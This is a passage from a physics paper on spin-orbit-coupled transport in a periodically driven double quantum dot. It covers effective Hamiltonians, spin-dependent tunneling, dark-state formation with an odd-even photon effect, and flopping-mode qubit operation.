\[\pm\tau_{\mathrm{sf}}\rightarrow\frac{\pm\tau_{\mathrm{sf}}}{2}\sum_{k=-\infty}^{\infty}\sum_{k^{\prime}=-\infty}^{\infty}J_{k}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)J_{2k^{\prime}}\left(\frac{\beta_{\mathrm{SO}}}{\omega}\right)\left(e^{i(-k\mp n+2k^{\prime})\omega t}+e^{i(-k\mp n-2k^{\prime})\omega t}\right), \tag{19}\]

where \(\pm\) corresponds to the sign of the two spin channels, as in equation (2). In the RWA, we find

\[\pm\tau_{\mathrm{sf}}\rightarrow\,(\mp 1)^{n+1}\tau_{\mathrm{sf}}^{\mathrm{RWA}}, \tag{20}\]
\[\tau_{\mathrm{sf}}^{\mathrm{RWA}}=\tau_{\mathrm{sf}}\sum_{k=-\infty}^{\infty}J_{2k+n}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)J_{2k}\left(\frac{\beta_{\mathrm{SO}}}{\omega}\right). \tag{21}\]

Finally, consider the last term on equation (17b). After applying the transformation of equation (13), we find a term \(\propto|L\rangle\langle R|\hat{\sigma}_{z}\) with amplitude

\[\tau_{\mathrm{sf}}\sum_{k=-\infty}^{\infty}\sum_{k^{\prime}=0}^{\infty}J_{k}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)J_{2k^{\prime}+1}\left(\frac{\beta_{\mathrm{SO}}}{\omega}\right)\left(e^{i(k+2k^{\prime}+1)\omega t}-e^{i(k-2k^{\prime}-1)\omega t}\right). 
\tag{22}\] In the RWA, only the terms with \(k=\pm(2k^{\prime}+1)\) contribute and we obtain the real tunneling rate \[\tau_{\mathrm{si}}^{\mathrm{RWA}}=\tau_{\mathrm{sf}}\sum_{k=-\infty}^{\infty }J_{2k+1}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)J_{2k+1}\left( \frac{\beta_{\mathrm{SO}}}{\omega}\right). \tag{23}\] This produces spin-conserving amplitudes of different absolute values depending on the direction of the spin, i.e., the spin-conserving tunneling of a spin-down particle occurs with a tunneling amplitude different from that of a spin-up particle. Note that this term arises only because of the combination of sidebands from both the ac voltage and the OME term, resulting in a finite static component that contributes to the Hamiltonian even in the RWA. Remarkably, both electric and magnetic sidebands arise from the same applied voltage. In that sense, this is a constructive self-interference effect, in a similar way to virtual tunneling processes that involve two PAT transitions [55, 57]. Let us now compare the results for arbitrary \(\beta_{\mathrm{SO}}\) with the Hamiltonian in the \(\beta_{\mathrm{SO}}\ll\omega\) limit, equation (15). Again, let us focus on \(n=1,\ \delta\approx 0\). We diagonalize the spin subspace by performing a rotation around the y-axis by an angle \(\theta\equiv\arctan(E_{z}^{\rm RWA}/\beta_{\rm SO}^{\rm RWA})\), where \(E_{z}^{\rm RWA}\equiv E_{z}J_{0}\left(\beta_{\rm SO}/\omega\right)-\omega\) and \(\beta_{\rm SO}^{\rm RWA}\equiv E_{z}J_{1}(\beta_{\rm SO}/\omega)\). Finally, the effective Hamiltonian in its matrix form reads \[\hat{\widetilde{H}}=\left(\begin{array}{cccc}(\widetilde{E}_{z}-\delta)/2&0&- \widetilde{\tau}_{\uparrow}&-\widetilde{\tau}_{\rm sf}\\ 0&(-\widetilde{E}_{z}-\delta)/2&-\widetilde{\tau}_{\rm sf}&-\widetilde{\tau}_ {\downarrow}\\ -\widetilde{\tau}_{\uparrow}&-\widetilde{\tau}_{\rm sf}&(\widetilde{E}_{z}+ \delta)/2&0\\ -\widetilde{\tau}_{\rm sf}&-\widetilde{\tau}_{\downarrow}&0&(-\widetilde{E}_ {z}+\delta)/2\end{array}\right), \tag{24}\] where we have defined the effective magnitudes as \[\widetilde{E}_{z} \equiv \sqrt{(E_{z}^{\rm RWA})^{2}+(\beta_{\rm SO}^{\rm RWA})^{2}}, \tag{25}\] \[\widetilde{\tau}_{\uparrow,\downarrow} \equiv \tau_{0}^{\rm RWA}\mp\left[\sin(\theta)\tau_{\rm sf}^{\rm RWA}- \cos(\theta)\tau_{\rm si}^{\rm RWA}\right],\] (26) \[\widetilde{\tau}_{\rm sf} \equiv \cos(\theta)\tau_{\rm sf}^{\rm RWA}+\sin(\theta)\tau_{\rm si}^{ \rm RWA}. \tag{27}\] The effective model represents a DQD system in the presence of a homogeneous Zeeman splitting \(\widetilde{E}_{z}\), a spin-conserving tunneling rate which is different in general for the spin-up and spin-down channels \(\widetilde{\tau}_{\uparrow,\downarrow}\), and a spin-flip tunneling rate \(\widetilde{\tau}_{\rm sf}\). The magnetic field can be simplified for \(\beta_{\rm SO}<\omega\) as \(\widetilde{E}_{z}=\beta_{\rm SO}/2+\mathcal{O}\left((\beta_{\rm SO}/\omega)^{ 5}\right)\), recovering the linear relation between \(\delta\) and \(\beta_{\rm SO}\) for the resonant condition explained above. Note that the effective model is strictly only valid for small detuning \(\delta\ll\omega\). The different spin-conserving tunneling rates \(\widetilde{\tau}_{\uparrow,\downarrow}\) contribute in a characteristic fashion to the current. In figure 4(a), we observe a significant asymmetry between the two secondary resonances depending on the sign of \(\delta\). 
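The effective parameters entering equations (24)-(27) can be evaluated with truncated Bessel sums. A sketch for the \(n=1\) spin resonance (ours; the truncation order, the use of `arctan2` for the rotation angle, and the quoted parameter set are implementation choices):

```python
import numpy as np
from scipy.special import jv

def effective_couplings(eps_ac, beta_SO, E_z, omega, tau, chi, kmax=10):
    """Effective magnitudes of eqs. (21), (23) and (25)-(27) at the n = 1 spin
    resonance E_z ~ omega, with the Bessel sums truncated at |k| <= kmax."""
    tau_sf, tau_0 = chi * tau, (1 - chi) * tau
    z_e, z_b = eps_ac / omega, beta_SO / omega
    k = np.arange(-kmax, kmax + 1)
    tau0_rwa = tau_0 * jv(0, z_e)                                       # cf. eq. (15)
    tausf_rwa = tau_sf * np.sum(jv(2 * k + 1, z_e) * jv(2 * k, z_b))    # eq. (21), n = 1
    tausi_rwa = tau_sf * np.sum(jv(2 * k + 1, z_e) * jv(2 * k + 1, z_b))  # eq. (23)
    Ez_rwa = E_z * jv(0, z_b) - omega
    bso_rwa = E_z * jv(1, z_b)
    theta = np.arctan2(Ez_rwa, bso_rwa)          # theta = arctan(Ez_rwa / bso_rwa)
    Ez_eff = np.hypot(Ez_rwa, bso_rwa)                                  # eq. (25)
    bracket = np.sin(theta) * tausf_rwa - np.cos(theta) * tausi_rwa
    tau_up, tau_down = tau0_rwa - bracket, tau0_rwa + bracket           # eq. (26)
    tau_sf_eff = np.cos(theta) * tausf_rwa + np.sin(theta) * tausi_rwa  # eq. (27)
    return Ez_eff, tau_up, tau_down, tau_sf_eff

# Parameter set of the cut in figure 4(b): E_z = omega, eps_ac = 1.2*omega,
# beta_SO = 0.4*omega, tau = 0.1*omega, chi = 0.2 (energies in units of omega).
print(effective_couplings(1.2, 0.4, 1.0, 1.0, 0.1, 0.2))
```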
As we shall see next, this asymmetry arises fundamentally due to the fact that \(|\widetilde{\tau}_{\uparrow}|\neq|\widetilde{\tau}_{\downarrow}|\). The two satellite peaks shown in figure 4(b) occur when the energies of two levels with opposite spin are in resonance 2. This is the situation schematized in figure 4. If \(\delta<0\), the spin-down state of the left dot is in resonance with the spin-up state of the right dot and the most likely tunneling path is given by \(\widetilde{\tau}_{\rm sf}\), while \(\widetilde{\tau}_{\downarrow}\) can be neglected at first order. Meanwhile, the spin-up energy level on the left dot is out of resonance with an energy difference given by \(\widetilde{E}_{z}\). However, due to \(\widetilde{\tau}_{\uparrow}\), there is still a small but finite probability of tunneling to the right dot [76]. In the case of \(\delta>0\), we have a similar situation, except that the non-resonant level (spin-down in this case) tunnels with an amplitude given by \(\widetilde{\tau}_{\downarrow}\). Using equations (21, 23) with \(k=-2,-1,\ldots,2\), and the parameters used in figure 4(b), we obtain \(\widetilde{\tau}_{\uparrow}\simeq 0.06\omega\) and \(\widetilde{\tau}_{\downarrow}\simeq 0.04\omega\), and \(\widetilde{\tau}_{\rm sf}\simeq 0.002\omega\). Since \(\widetilde{\tau}_{\uparrow}>\widetilde{\tau}_{\downarrow}\) the effective model predicts a higher current for resonance at \(\delta<0\), which is in agreement with the numerical results obtained from the original Hamiltonian. In figure 4(b), we compare the current obtained both with the total Hamiltonian (equation (2)) and with the effective Hamiltonian (equation (24)), showing how the effective Hamiltonian predicts the presence of satellite peaks close to the main resonance and the asymmetry in \(\delta\). The fact that the asymmetry in \(\delta\) is a consequence of \(|\widetilde{\tau}_{\uparrow}|\neq|\widetilde{\tau}_{\downarrow}|\) can be further seen by calculating the effective magnetic field due to the TME, which is explicitly asymmetric in \(\delta\). This is shown in more detail in C. ## 4 Dark state formation Dark states are a well-known feature in open quantum systems, first described in the context of the optical response of electrons to laser pumping. In mesoscopic transport, a dark state refers to a steady state in which coherent interference results in a current blockade even in a situation where it would be expected to flow [77, 78, 79, 80]. In this particular setup, dark states correspond to a particle confined to the left dot, as the right dot will be immediately emptied by tunneling to the drain. In the following, we focus on the main resonances \(\delta=m\omega\), \(m\in\mathbb{Z}\), where a non-zero current is expected to flow. In this case, as mentioned above, current blockade occurs due to the LZS interference pattern at the points where \(J_{m}\left(\epsilon_{\mathrm{ac}}/\omega\right)=0\), yielding the aforementioned CDT. Taking into account the resonance \(\delta=0\), the current through the DQD can be suppressed if the driving amplitude verifies \(J_{0}(\epsilon_{\mathrm{ac}}/\omega)=0\), which occurs close to \(\epsilon_{\mathrm{ac}}\simeq 2.4\omega\). As described above, this renormalization is the same for both the spin-conserving and spin-flip tunneling amplitudes. 
However, if the system is simultaneously in a configuration in which the spin states are also in resonance with the ac voltage frequency \(E_{z}=n\omega\), the renormalization is not necessarily the same, as seen in the previous section. We focus on this case in the following. Let us consider the Hamiltonian in the rotating frame, as in equation (15), for an \(n-\)photon resonance. First, consider \(\beta_{\mathrm{SO}}=0\). We analyze below how the dark states are affected when including a non-zero OME term. In the case of a spin-up particle tunneling from the left to the right dot, emitting \(n\) photons, the spin-flip tunneling rate is renormalized as \(\tau_{\mathrm{sf}}\to\tau_{\mathrm{sf}}J_{-n}(\epsilon_{\mathrm{ac}}/\omega)\). On the other hand, if the particle tunnels from the left dot with spin down, it will absorb \(n\) photons, so that \(\tau_{\mathrm{sf}}\to\tau_{\mathrm{sf}}J_{n}(\epsilon_{\mathrm{ac}}/\omega)\). This situation is shown schematically in figure 5(a). The effective Hamiltonian under an RWA then reads

\[\hat{H}^{(n)}_{\mathrm{RWA}}=\left(\begin{array}{cccc}0&0&-\tau_{0}J_{0}(\epsilon_{\mathrm{ac}}/\omega)&-\tau_{\mathrm{sf}}J_{n}(\epsilon_{\mathrm{ac}}/\omega)\\ 0&0&\tau_{\mathrm{sf}}J_{-n}(\epsilon_{\mathrm{ac}}/\omega)&-\tau_{0}J_{0}(\epsilon_{\mathrm{ac}}/\omega)\\ -\tau_{0}J_{0}(\epsilon_{\mathrm{ac}}/\omega)&\tau_{\mathrm{sf}}J_{-n}(\epsilon_{\mathrm{ac}}/\omega)&0&0\\ -\tau_{\mathrm{sf}}J_{n}(\epsilon_{\mathrm{ac}}/\omega)&-\tau_{0}J_{0}(\epsilon_{\mathrm{ac}}/\omega)&0&0\end{array}\right). \tag{28}\]

Since \(J_{-n}(z)=(-1)^{n}J_{n}(z)\), if the number of photons is odd, then the spin-flip term has the same sign for both spin directions. As discussed in A, time-reversal symmetry imposes the requirement that the spin-flip term must be \(\propto\hat{\tau}_{y}\), in terms of the charge Pauli matrices introduced above. This form of tunneling prohibits destructive interference between the spin-conserving and spin-flip tunneling channels. However, if the number of photons is odd, the RWA Hamiltonian in equation (28) has a spin-flip term of the form \(\hat{\tau}_{x}\hat{\sigma}_{x}\), which does not exhibit this protection. Instead, the combination of \(E_{z}\neq 0\) (breaking time-reversal symmetry) and \(\epsilon_{\rm ac}\neq 0\) (resulting in PAT) allows the spin-conserving and spin-flip paths to interfere destructively. By exact diagonalization of the above Hamiltonian, we look for a DS of the form \(|{\rm DS}\rangle=(|L\uparrow\rangle+e^{i\varphi}|L\downarrow\rangle)/\sqrt{2}\) for an arbitrary relative phase \(\varphi\), which we find occurs when the ratio \(\chi\) between the spin-conserving and spin-flip amplitudes satisfies

\[\widetilde{\chi}^{(n)}=\frac{J_{0}(\epsilon_{\rm ac}/\omega)}{J_{0}(\epsilon_{\rm ac}/\omega)\pm i^{n+1}J_{n}(\epsilon_{\rm ac}/\omega)}, \tag{29}\]

where the superindex denotes the dependence of the dark state on the resonance with the driving \(E_{z}=n\omega\). Since we must impose \(\widetilde{\chi}^{(n)}\in\mathds{R}\) (see equation (3)), the dark state appears only when an odd number of photons are absorbed or emitted, i.e., \(n=2k+1\) for \(k\in\mathds{Z}\). In particular, \(E_{z}=0\) corresponds to taking \(n=0\), and equation (29) has no real solution, showcasing the need to break the time-reversal symmetry to observe dark-state formation. 
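Equation (29) is easy to evaluate; a small sketch (ours) checking the '+' branch for one- and two-photon spin resonances:

```python
import numpy as np
from scipy.special import jv

def chi_dark(n, z):
    """Dark-state condition of eq. (29) ('+' branch) at the spin resonance
    E_z = n*omega, with z = eps_ac/omega."""
    return jv(0, z) / (jv(0, z) + (1j) ** (n + 1) * jv(n, z))

for z in (1.0, 1.5, 2.0, 2.5):
    c1, c2 = chi_dark(1, z), chi_dark(2, z)
    print(f"eps_ac = {z:.1f} w:  n=1 -> {c1.real:.3f} + {c1.imag:.1e}j,"
          f"  n=2 -> {c2.real:.3f} + {c2.imag:.2f}j")
# For n = 1 the imaginary part vanishes, so a physical chi exists and a dark
# state forms; for n = 2 the value is complex and no dark state is possible,
# reflecting the odd-even effect discussed next.
```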
The dependence on the number of photons involved in the process is known as the odd-even effect, and has already been observed in DQDs, both theoretically and experimentally [68, 81, 82, 62, 63]. This type of process is generally intrinsic to multilevel systems, in which multiple pathways destructively interfere with each other [83]. In figure 5(b-c) we show the current through a DQD in the cases of \(n=1\) and \(n=2\), respectively. In the former case, we plot the analytical prediction for the existence of a dark state, equation (29), which is in agreement with the numerical results. If the spin-conserving tunneling path is not available, i.e., \(\tau_{0}=0\), or equivalently \(\chi=1\), then the only possible tunneling channel requires spin-flip, which is highly suppressed because of the large energy gap between states with opposite spin produced by \(E_{z}\). This process also results in current blockade (unrelated to interference effects) and is visible in the upper left corner of this figure. For \(n=2\) we see that the only two situations where the current is suppressed coincide with \(\chi\simeq 1\), \(\epsilon_{\rm ac}=0\), and with \(\chi=0\), \(\epsilon_{\rm ac}\simeq 2.4\omega\), as expected from the even-odd effect. In an experimental situation, in which the driving amplitude can be precisely tuned, the appearance of a sharp decrease in current at a given \(\epsilon_{\rm ac}\) can be used to determine the value of \(\chi\) and hence the SOC strength. To minimize the uncertainty of the measurement, several odd resonances for \(E_{z}=(2k+1)\omega\) can be studied, providing a precise way to characterize the SOC present in a given device. Next, we fix the driving amplitude at \(\epsilon_{\rm ac}=2\omega\) and consider arbitrary values of \(E_{z}\). The corresponding results are presented in figure 6(a). The DS at the exact resonant condition \(E_{z}=\omega\) extends to non-resonant values of \(E_{z}\), forming a parabola in the \(E_{z}-\chi\) plane. Again, we perform an exact diagonalization of the RWA Hamiltonian given by equation (28) and look for dark states. Up to second order in \((E_{z}-\omega)\), these are found for the condition \[\widetilde{\chi}^{(1)} = \frac{J_{0}(\epsilon_{\rm ac}/\omega)^{2}-|J_{0}(\epsilon_{\rm ac }/\omega)J_{1}(\epsilon_{\rm ac}/\omega)|}{J_{0}(\epsilon_{\rm ac}/\omega)^{2 }-J_{1}(\epsilon_{\rm ac}/\omega)^{2}} \tag{30}\] \[-\frac{(E_{z}-\omega)^{2}}{\tau^{2}|J_{0}(\epsilon_{\rm ac}/ \omega)J_{1}(\epsilon_{\rm ac}/\omega)|}+\mathcal{O}\left((E_{z}-\omega)^{4} \right).\] The prediction is in accordance with the numerical results (see the inset of figure 6(a)). Far from the resonance, the RWA is no longer valid, so the above equation does not apply. Once again, even if the dot levels are in resonance at \(\delta=0\), a trivial DS at \(\chi=1\) appears. In that situation, \(E_{z}\) is no longer in resonance with the driving, so the particle cannot absorb or emit a photon, and will be blocked in the left QD, as explained above. Next, we consider the case for an arbitrary amplitude of the OME term. Here, we find a more complex situation. The OME term induces fast spin rotations inside the QDs, which prevents current blockade in situations where, otherwise, the particle would remain stuck in the left dot. This effect is most clearly seen in figure 6 for \(\chi\simeq 1\), where the current is blocked for \(\beta_{\rm SO}=0\) (figure 6(a)) if \(E_{z}\neq\omega\), while for \(\beta_{\rm SO}\neq 0\) (figure 6(b)) a non-zero current can flow. 
Dark states, on the other hand, can still be found, now extending to all values of \(E_{z}\). Interestingly, the spin projection of the steady state is highly polarized, depending on whether \(0<E_{z}<\omega\), for which the particle remains in the left QD with spin down, or \(\omega<E_{z}<2\omega\) so that the final spin projection is inverted. It is also worth mentioning that the DS obtained far from the resonance \(E_{z}\neq\omega\) are highly pure with \(\Tr(\rho^{2})\simeq 1\). These DSs could be used to store quantum information inside a QD without the requirement to modify the tunneling from the leads or between dots. Due to the complexity of our system, no analytical results could be obtained for the formation of DSs for \(\beta_{\rm SO}\neq 0\). Nonetheless, we can still gain an understanding of their appearance by employing the Floquet formalism. For a \(T\)-periodic Hamiltonian, the time evolution of the wave function can be written as \(|\Psi_{\alpha}(t)\rangle=e^{-i\varepsilon_{\alpha}t}|\phi_{\alpha}(t)\rangle\), where \(\varepsilon_{\alpha}\) are the quasienergies and \(|\phi_{\alpha}\rangle\) are the Floquet states, obtained by diagonalizing the Floquet Hamiltonian \(\hat{\mathcal{H}}(t)\equiv\hat{H}(t)-i\partial_{t}\). According to the Von Neumann-Wigner theorem [84], crossings between distinct energy levels occur only if the corresponding states belong to different representations of the symmetry group of the system. Quasienergy crossings follow the same behavior, often signaling that the ac drive has reinstated a symmetry of the system by suppressing the relevant terms in the Hamiltonian [51]. At these crossings, the time evolution operator depends exponentially on the difference between the quasienergies. In resonance, the unitary time evolution matrix becomes the identity operator, freezing the long-term dynamics. The quasienergies for \(\beta_{\mathrm{SO}}\neq 0\) have been obtained by means of numerical methods [85], and their crossings perfectly agree with the location of the DS found by evolving the Lindblad master equation (see figure 6(b)). The Floquet quasienergies for \(E_{z}=0.7\omega\) are shown in figure 6(c). The crossing is located at \(\chi\simeq 0.6\), which coincides with the numerical result for the open system. ## 5 Flopping mode qubit operation We next focus on the situation in which the spin motion is confined to one of the dots. Neglecting the OME term for simplicity, the spin dynamics in that case is governed by the interplay between the Zeeman splitting and the TME first discussed in section 2. In this section, we consider this regime as a possible implementation of a solid-state qubit. Let us first consider the case where we have an electric field that is constant in time. We can perform a SWT to obtain an effective Hamiltonian for an isolated spin in one of the dots. This transformation allows us to obtain the dynamics in one energy subspace that is weakly coupled and well separated in energy from another. In this case, we consider the states for each QD as each of the energy subspaces, so the effective Hamiltonian after the SWT is valid provided that we are far from the resonances (both spin-conserving and spin-flip ones), i.e., \(|\delta|\gg\tau_{0},|\delta\pm E_{z}|\gg\tau_{\mathrm{sf}}\). 
Under these conditions, we obtain an effective Hamiltonian that is second order in the tunneling and contains all contributions due to virtual tunneling to the other dot, given by

\[\hat{H}_{\rm eff} = \hat{H}_{\rm eff}^{(0)}+\hat{H}_{\rm eff}^{(2)}, \tag{31}\]
\[\hat{H}_{\rm eff}^{(0)} = \frac{\delta}{2}\hat{\tau}_{z}+\frac{E_{z}}{2}\hat{\sigma}_{z}, \tag{32}\]
\[\hat{H}_{\rm eff}^{(2)} = \frac{\hat{\tau}_{z}}{2}(-\delta^{(2)}+b_{z}^{(2)}\hat{\sigma}_{z}+b_{\perp}^{(2)}\hat{\sigma}_{x}), \tag{33}\]

where

\[\delta^{(2)} = \frac{2\tau_{0}^{2}}{\delta}+\tau_{\rm sf}^{2}\left(\frac{1}{\delta+E_{z}}+\frac{1}{\delta-E_{z}}\right), \tag{34a}\]
\[b_{z}^{(2)} = \tau_{\rm sf}^{2}\left(\frac{1}{\delta+E_{z}}-\frac{1}{\delta-E_{z}}\right), \tag{34b}\]
\[b_{\perp}^{(2)} = \tau_{0}\tau_{\rm sf}\left(\frac{1}{\delta+E_{z}}-\frac{1}{\delta-E_{z}}\right). \tag{34c}\]

The first term in equation (33) consists of a renormalization of the detuning \(\delta\) due to virtual tunneling. Similarly, the second term is a renormalization of \(E_{z}\) which arises from spin-flip tunneling to the right dot and back. The third term is an effective magnetic field in the direction perpendicular to the external field that gives rise to \(E_{z}\). It arises from a combination of spin-conserving and spin-flip tunneling. In this process, the spin virtually tunnels to the adjacent dot, flipping its spin, and then tunnels back to the original dot through the spin-conserving path, producing an effective spin rotation. This is the TME discussed in section 2 and, like the OME, arises from the motion of the particle under the SOC (the inter-dot dynamics, in this case). Note that, in the same manner as the OME, the TME requires \(E_{z}\neq 0\) to break the time-reversal symmetry.

Figure 6: Current through a DQD as a function of \(\chi\) and \(E_{z}\) for (a) \(\beta_{\mathrm{SO}}=0\), and (b) \(\beta_{\mathrm{SO}}=0.2E_{z}\). Darker colors represent the appearance of DSs. The inset in panel (a) represents a zoom into the DS around \(E_{z}\simeq\omega\), while the dashed black line denotes the analytical prediction in equation (30). The dashed black line in panel (b) represents the DS predicted by the crossing of Floquet quasienergies. (c) Floquet quasienergies for \(E_{z}=0.7\omega\) (dash-dotted line, panel (b)), with the energy crossing highlighted with a circle. \(\delta=0\), \(\omega=10\tau=100\Gamma\), \(\epsilon_{\mathrm{ac}}=2\omega\).

The effective magnetic field induced by the TME can be used in a similar manner to that of the flopping-mode qubit [65, 67]. However, the qubit cannot be manipulated via detuning alone due to the lack of two-axis control, unless the spin-flip and spin-conserving tunneling amplitudes can be manipulated independently, i.e., unless \(\chi\) can itself be tuned, e.g., by manipulating the overlap between the particle wave functions centered at each dot [66], rapidly enough to avoid dephasing. Nonetheless, for a time-dependent detuning, as discussed here, the TME allows for resonant manipulation of the spin. Let us focus on the case where \(\epsilon_{\rm ac}\ll\omega\). Then, in the rotating frame and after applying the RWA, we obtain an effective spin model for the resonance \(E_{z}=\omega\). 
Applying the ac gate with a phase \(\phi\) allows two-axis control of the qubit

\[\hat{H}_{\rm RWA}=\frac{b_{z}^{(2)}}{2}\hat{\sigma}_{z}-\frac{\tilde{b}_{1,\perp}}{2}\left(\cos\phi\,\hat{\sigma}_{x}+\sin\phi\,\hat{\sigma}_{y}\right), \tag{35}\]

where

\[\tilde{b}_{1,\perp}=\frac{4\epsilon_{\rm ac}\tau_{0}\tau_{\rm sf}E_{z}}{\delta\left(\delta^{2}-E_{z}^{2}\right)}. \tag{36}\]

Alternatively, the frequency of the ac gate can be matched with the renormalized splitting of the two levels of the qubit \(E_{z}+b_{z}^{(2)}\). The correction to \(\tilde{b}_{1,\perp}\) in this case can be given as

\[\tilde{b}_{1,\perp}\rightarrow\tilde{b}_{1,\perp}+\frac{2\epsilon_{\rm ac}\tau_{0}\tau_{\rm sf}b_{z}^{(2)}}{\left(\delta^{2}-E_{z}^{2}\right)^{2}}, \tag{37}\]

which is small in the context of the previous approximations. In figure 7(a), we show the dynamics of the flopping-mode qubit using the effective Hamiltonian described above. For comparison, we also show the result obtained by integrating the equation of motion of a closed system under the original Hamiltonian given by equation (2). Since both dot energy levels are out of resonance, with \(\delta=\omega/2\), the population of the right dot is small and the particle remains in the left dot. The results obtained show how the effective model correctly reproduces the dynamics of the system. The Rabi oscillation frequency of the effective model is given by

\[\nu_{\rm R}=\frac{1}{2\pi}\sqrt{\left(b_{z}^{(2)}\right)^{2}+\left(\tilde{b}_{1,\perp}\right)^{2}}. \tag{38}\]

We compare the Rabi frequency of the effective RWA Hamiltonian with that obtained from the original Hamiltonian; see figure 7(b). The results agree for \(|\delta-n\omega|\gg\tau\), as expected.

Figure 7: (a) Rabi oscillations in a closed system governed by the full Hamiltonian (symbols) given by equation (2). The dynamics given by the RWA Hamiltonian (solid lines) given by equation (35) is plotted for comparison. The Rabi frequency \(\nu_{\rm R}\) is indicated in the figure. The parameters used are \(\delta=\omega/2\) and \(\tau=0.1\omega\). (b) Rabi frequency as a function of detuning for different total tunneling rates. The results are obtained with the full Hamiltonian (symbols) and the effective RWA Hamiltonian (solid lines). The total tunneling rate is \(\tau=0.05\omega\) (yellow, triangles), \(\tau=0.1\omega\) (orange, squares), and \(\tau=0.2\omega\) (brown, pentagons). Other parameters, common for both panels, are \(\epsilon_{\rm ac}=0.2\omega\), \(E_{z}=\omega\), \(\chi=0.2\), and \(\beta_{\rm SO}=0\).

It should be noted that this method of manipulation couples the spin with electric fluctuations due to the dependence of \(b_{z}^{(2)}\) and \(b_{\perp}^{(2)}\) on \(\delta\). In purified silicon, where the magnetic noise caused by the atomic nuclei is heavily suppressed, this may be the main source of decoherence for the qubit [86, 87]. In the low ac gate amplitude regime described here, the flopping-mode qubit lacks a natural sweetspot [88, 89] in which the system is insensitive to electric noise to first order in the coupling to the bath. In particular, electric noise that enters through \(b_{z}^{(2)}\) could only be efficiently suppressed at \(\delta=0\), where the first derivative with respect to \(\delta\), i.e., the noise susceptibility, vanishes. However, at this value, the qubit cannot be operated as the direct spin-conserving transition is resonant. 
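The Rabi frequency of equation (38) follows directly from the closed-form second-order fields and can be scanned in detuning. A minimal sketch (ours, using the parameters quoted for figure 7(b); the scan range is an arbitrary choice):

```python
import numpy as np

def rabi_frequency(delta, E_z, eps_ac, tau, chi):
    """Rabi frequency of eq. (38) built from eqs. (34b) and (36); valid away from
    the resonances, |delta| >> tau_0 and |delta +/- E_z| >> tau_sf."""
    tau_sf, tau_0 = chi * tau, (1 - chi) * tau
    b_z = tau_sf**2 * (1.0 / (delta + E_z) - 1.0 / (delta - E_z))               # eq. (34b)
    b_perp = 4 * eps_ac * tau_0 * tau_sf * E_z / (delta * (delta**2 - E_z**2))  # eq. (36)
    return np.sqrt(b_z**2 + b_perp**2) / (2 * np.pi)                            # eq. (38)

# Detuning scan with E_z = omega, eps_ac = 0.2*omega, tau = 0.1*omega, chi = 0.2
# (all energies in units of omega):
delta = np.linspace(0.3, 0.9, 601)
nu_R = rabi_frequency(delta, E_z=1.0, eps_ac=0.2, tau=0.1, chi=0.2)
print("minimum of nu_R near delta =", round(float(delta[np.argmin(nu_R)]), 3))
```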
However, the perpendicular component of the effective magnetic field of equation (36) can be made insensitive to noise to first order at \(\delta=\pm E_{z}/\sqrt{3}\) which can improve qubit operation. This dynamical sweetspot [57, 90] is observed as a minimum of the Rabi frequency at \(\delta\simeq 0.58\omega\) in figure 7(b). In B we give expressions for the TME at arbitrary ac detuning amplitudes. Unlike the simple limit shown in equation (36), these expressions are quite complex, highlighting the fact that the effective magnetic field arises from second-order virtual tunneling involving two PAT processes. In the arbitrary-amplitude limit, as given in B, we can achieve a fine degree of spin manipulation. Furthermore, we also obtain dynamical sweetspots for large ac gate amplitudes. ## 6 Conclusions We have studied the effect of SOC on spin transport in a periodically driven DQD. Due to the presence of a spin-flip tunneling path, a highly spin-polarized current can be achieved by tuning the onsite energy difference between the dots. In this direction, we propose several mechanisms to obtain on-demand highly polarized currents in both directions with fully electric control, allowing fast switching of the polarization under experimental conditions. Furthermore, the combination of the orbital dynamics inside the dots and the ac voltage results in the appearance of an effective magnetic field, powering the electric dipole spin resonances in the dots. In transport, the effect of this field can be most clearly observed in the appearance of characteristic avoided crossings of the tunneling resonances near the EDSR condition \(E_{z}\simeq n\omega\). Tunneling under this condition results in striking novel phenomena, such as spin-dependent tunneling amplitudes due to the constructive self-interference of the sidebands coming from the electric and (effective) magnetic fields. Notably, both of these processes arise from the same ac voltage, with the electric field being the direct result of this voltage and the magnetic field effectively incorporating the dynamics of the excited states of the potential. We also investigate the appearance of new dark states when the system is driven under the EDSR condition, resulting from the interference between photo-assisted spin-conserving and spin-flip processes with different numbers of photons involved. Without a Zeeman splitting, time-reversal symmetry protects against destructive interference between these two processes. However, in the presence of a magnetic field, together with an ac voltage, these two paths can interfere and create dark states. These states exhibit a characteristic even-odd effect, appearing only for odd sideband transitions. Moreover, since the current drop is very sharp, its location can be used to characterize the SOC present in the system. These dark states could be useful for quantum information storage, as they are both highly pure and spin-polarized. Finally, we study the viability of flopping-mode qubit operations when the particle is localized in one of the dots. We provide expressions for the effective magnetic field arising from the interdot motion of the particle under SOC for arbitrary ac-gate amplitudes and particularize the experimentally (more easily) accessible case of small gate amplitudes. In this situation, we identify a dynamical sweetspot induced by the ac voltage, where the Rabi frequency is insensitive to charge noise to first order in detuning. 
This point of operation may be important for novel solid-state quantum computing platforms, such as isotopically purified silicon, where decoherence due to the nuclear magnetic field can be suppressed, and electric noise may be the most relevant source of decoherence. G.P. and D.F.F. are supported by Spain's MINECO through Grant No. PID2020-117787GB-I00 and by the CSIC Research Platform PTI-001. D.F.F. acknowledges support from FPU Program No. FPU20/04762. J.P.C. acknowledges DFG funding through project B04 of SFB 1277 Emerging Relativistic Phenomena in Condensed Matter. D. F. F. and J. P. C. have contributed equally to this work. ## Appendix A Effective model In this section, we briefly discuss the origin of the OME term \(\hat{H}_{1}(t)\) in the Hamiltonian of equation (1_a_). We follow a similar derivation to [69, 91], employing a Schrieffer-Wolff transformation (SWT) to obtain the effective Hamiltonian on the basis employed in the main text. We consider the Hamiltonian for a single particle in a linear DQD (in the x-direction) under both electric and magnetic fields and in the presence of SOC modeled by the spin-orbit vector [92]\(\mathbf{\alpha}=(\alpha_{x},\alpha_{y},0)\) compatible with 2DEGs grown along the [001] direction [93], i.e., the z-direction in our model. We consider an electric field in the x-direction and a Zeeman splitting \(E_{z}\) in the direction normal to the QD plane (in the z-direction). All this together yields the Hamiltonian \[\hat{H}\left(x,t\right)=\hat{H}_{k}+V\left(x\right)+\hat{H}_{e} \left(x,t\right)+\hat{H}_{z}+\hat{H}_{\mathrm{SO}}, \tag{16}\] \[\hat{H}_{k}=k^{2}/2m,\] (17) \[\hat{H}_{e}\left(x,t\right)=exE\left(t\right),\] (18) 